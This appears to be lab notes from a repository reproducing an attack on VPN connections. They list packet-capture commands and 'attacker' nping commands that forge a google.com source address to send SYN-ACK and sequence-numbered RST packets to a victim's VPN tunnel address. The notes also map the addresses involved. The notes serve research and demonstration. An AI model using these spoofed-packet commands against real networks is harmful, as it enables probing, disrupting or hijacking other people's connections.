You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

28 lines
1.0 KiB

  1. Nping pcap commands during each phase:
  2. On attacker machine: `sudo tcpdump -i wlp1s0 -nnvvS not src port 22 and not dst port 22 -w wash_attacker.pcap`
  3. On victim macine: `sudo tcpdump -i any -nnvvS not src port 22 and not dst port 22 -w vic_any_capture_wash.pcap`
  4. Attacker commands
  5. Phase 2: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags SA -p 40402`
  6. Phase 3: `sudo nping -e wlp1s0 --dest-mac 08:00:27:1a:08:ba --dest-ip 10.7.7.8 --source-ip 172.217.12.14 -g 80 --tcp --flags R -p 40404 --seq 4253820601`
  7. Addresses in netcat example:
  8. Phase 2 pcap: --> (netcat 172.217.12.14 80 -p 40402)
  9. Remote web address (google.com) -- 172.217.12.14:80
  10. Victim VPN address -- 10.7.7.8:40402
  11. Victim public address -- 192.168.12.137
  12. VPN server address -- 153.92.40.5:443
  13. In the example, the attacker sends 5 npings with to the correct four-tuple, then sends 5 to the wrong four-tuple (port 40403). Then sends 5 more to the correct port to show differences in response.